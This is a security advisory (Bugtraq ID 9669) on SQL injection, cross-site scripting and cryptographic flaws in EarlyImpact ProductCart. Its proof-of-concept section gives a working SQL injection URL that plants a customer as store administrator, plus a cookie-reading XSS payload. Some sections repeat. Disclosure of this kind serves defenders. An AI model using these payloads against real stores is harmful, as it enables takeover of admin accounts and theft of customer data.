EarlyImpact ProductCart Multiple Vulnerabilities
BID:9669
Info
EarlyImpact ProductCart Multiple Vulnerabilities
| Bugtraq ID: | 9669 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 16 2004 12:00AM |
| Updated: | Feb 16 2004 12:00AM |
| Credit: | Discovery is credited to Nick Gudov <[email protected]>. |
| Vulnerable: |
Early Impact ProductCart 2.5 Early Impact ProductCart 2.0 br000 Early Impact ProductCart 2.0 Early Impact ProductCart 1.6003 Early Impact ProductCart 1.6002 Early Impact ProductCart 1.5004 Early Impact ProductCart 1.5003 r Early Impact ProductCart 1.5003 Early Impact ProductCart 1.5002 Early Impact ProductCart 1.6 br003 Early Impact ProductCart 1.6 br001 Early Impact ProductCart 1.6 br Early Impact ProductCart 1.6 b003 Early Impact ProductCart 1.6 b002 Early Impact ProductCart 1.6 b001 Early Impact ProductCart 1.6 b Early Impact ProductCart 1.5 |
| Not Vulnerable: |
Early Impact ProductCart 2.53 |
Discussion
EarlyImpact ProductCart Multiple Vulnerabilities
EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities. The specific issues include SQL injection, cross-site scripting and cryptographic weaknesses. These issues could expose sensitive data such as user credentials and allow for execution of hostile script code and HTML. These issues could allow for full compromise of the software.
EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities. The specific issues include SQL injection, cross-site scripting and cryptographic weaknesses. These issues could expose sensitive data such as user credentials and allow for execution of hostile script code and HTML. These issues could allow for full compromise of the software.
Exploit / POC
EarlyImpact ProductCart Multiple Vulnerabilities
The following examples were submitted:
1. An attacker register new customer in store. Let the value of 'First
Name' field in registration form will be equal to
'1*2*3*4*5*6*7*8*9*10*', the value of 'Last Name ' field will be equal
to '34567', the value of 'Password' field will be equal to '111' and the
value of 'Postal Code' field will be equal to '987654'.
2. An attacker performs the following request:
http://www.example.com/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel
+)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&I
+DBrand=0&resultCnt=200&Submit.x=33&
3. An attacker logs into the store admin interface with username
'34567' and password '111'.
Cross-site scripting:
http://www.example.com/productcart/pc/Custva.asp?redirectUrl="><script>alert(document.cookie)</script><"
The following examples were submitted:
1. An attacker register new customer in store. Let the value of 'First
Name' field in registration form will be equal to
'1*2*3*4*5*6*7*8*9*10*', the value of 'Last Name ' field will be equal
to '34567', the value of 'Password' field will be equal to '111' and the
value of 'Postal Code' field will be equal to '987654'.
2. An attacker performs the following request:
http://www.example.com/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel
+)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&I
+DBrand=0&resultCnt=200&Submit.x=33&
3. An attacker logs into the store admin interface with username
'34567' and password '111'.
Cross-site scripting:
http://www.example.com/productcart/pc/Custva.asp?redirectUrl="><script>alert(document.cookie)</script><"
Solution / Fix
EarlyImpact ProductCart Multiple Vulnerabilities
Solution:
An upgrade is available that is not vulnerable to this issue.
The vendor has released a security update to deal with this issue.
Early Impact ProductCart 2.5
Solution:
An upgrade is available that is not vulnerable to this issue.
The vendor has released a security update to deal with this issue.
Early Impact ProductCart 2.5
-
EarlyImpact ProductCart_Security_Update_013004.zip
http://www.earlyimpact.com/productcart/support/updates/ProductCart_Sec urity_Update_013004.zip